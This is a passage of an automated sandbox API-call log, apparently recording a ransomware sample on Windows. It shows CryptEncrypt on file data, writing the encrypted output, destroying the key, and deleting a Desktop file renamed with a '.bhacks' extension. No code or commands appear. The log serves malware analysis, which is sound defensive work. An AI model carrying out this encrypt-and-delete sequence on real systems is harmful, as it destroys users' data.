lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0106.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0106.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0106.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0106.828] CryptEncrypt (in: hKey=0x9a4800, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x3450, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x3458) returned 1 [0106.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0106.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0106.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0106.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0106.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0106.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0106.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0106.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0106.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0106.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0106.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0106.828] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.828] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.829] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.829] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.829] CharLowerBuffW (in: lpsz="byte[13400]", cchLength=0xb | out: lpsz="byte[13400]") returned 0xb [0106.829] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.829] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.829] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0106.829] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0106.829] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0106.829] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0106.829] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0106.829] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0106.829] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0106.829] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9da8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0106.830] CryptEncrypt (in: hKey=0x9a4800, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a809e0*, pdwDataLen=0x8cef60*=0x3450, dwBufLen=0x3458 | out: pbData=0x2a809e0*, pdwDataLen=0x8cef60*=0x3458) returned 1 [0106.831] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.831] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.831] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.831] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.831] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.831] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.831] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.831] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0106.831] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0106.831] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0106.831] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0106.831] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0106.831] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0106.831] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0106.831] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0106.831] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0106.831] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0106.831] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0106.831] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0106.832] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0106.832] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0106.832] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0106.832] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0106.832] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0106.832] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0106.832] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0106.832] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.833] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0106.833] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0106.833] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0106.833] WriteFile (in: hFile=0x44c, lpBuffer=0x2a7a130*, nNumberOfBytesToWrite=0x3458, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesWritten=0x8cf5e4*=0x3458, lpOverlapped=0x0) returned 1 [0106.834] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0106.834] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0106.834] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0106.834] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0106.834] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0106.834] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0106.835] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0106.835] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0106.835] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0106.878] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0106.878] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0106.878] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0106.878] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0106.878] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0106.878] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aa9af0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0106.878] CryptDestroyKey (hKey=0x9a4800) returned 1 [0106.878] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0106.879] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0106.879] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0106.879] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0106.879] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0106.879] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0106.879] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0106.879] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0106.879] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0106.879] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0106.879] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0106.879] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0106.879] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0106.879] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0106.879] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0106.879] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0106.879] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0106.879] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0106.879] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0106.879] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0106.879] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0106.879] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0106.879] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0106.879] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0106.879] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0106.879] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0106.880] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0106.880] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0106.880] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0106.880] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0106.880] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0106.880] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0106.880] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0106.880] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0106.880] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0106.880] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0106.880] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0106.880] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0106.880] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0106.880] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0106.880] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0106.880] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0106.880] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0106.880] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0106.880] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0106.880] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0106.880] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0106.880] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0106.880] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0106.880] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0106.881] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0106.881] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0106.881] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0106.881] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0106.881] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7100, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0106.881] CryptReleaseContext (hProv=0x9bf440, dwFlags=0x0) returned 1 [0106.881] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0106.881] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0106.881] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0106.881] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0106.881] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0106.881] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0106.881] FreeLibrary (hLibModule=0x76390000) returned 1 [0106.881] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0106.881] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0106.881] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0106.881] CloseHandle (hObject=0x458) returned 1 [0106.882] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0106.882] CloseHandle (hObject=0x44c) returned 1 [0106.884] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0106.884] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0106.884] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0106.884] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0106.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0106.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6680 [0106.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0106.885] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/W3nCKPmZd6_T8yGD3CRn.jpg.bhacks", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\W3nCKPmZd6_T8yGD3CRn.jpg.bhacks", lpFilePart=0x8cedf4*="W3nCKPmZd6_T8yGD3CRn.jpg.bhacks") returned 0x37 [0106.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75d80 | out: hHeap=0x2af0000) returned 1 [0106.885] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\W3nCKPmZd6_T8yGD3CRn.jpg.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\w3nckpmzd6_t8ygd3crn.jpg.bhacks")) returned 0x20 [0106.885] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\W3nCKPmZd6_T8yGD3CRn.jpg.bhacks", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x241cd0f6, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x241cd0f6, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2421963f, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x3450, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="W3nCKPmZd6_T8yGD3CRn.jpg.bhacks", cAlternateFileName="W3NCKP~1.BHA")) returned 0x9a3b80 [0106.885] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\W3nCKPmZd6_T8yGD3CRn.jpg.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\w3nckpmzd6_t8ygd3crn.jpg.bhacks")) returned 1 [0106.886] FindNextFileW (in: hFindFile=0x9a3b80, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x241cd0f6, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x241cd0f6, ftLastAccessTime.dwHighDateTime=0x1d5dff9, 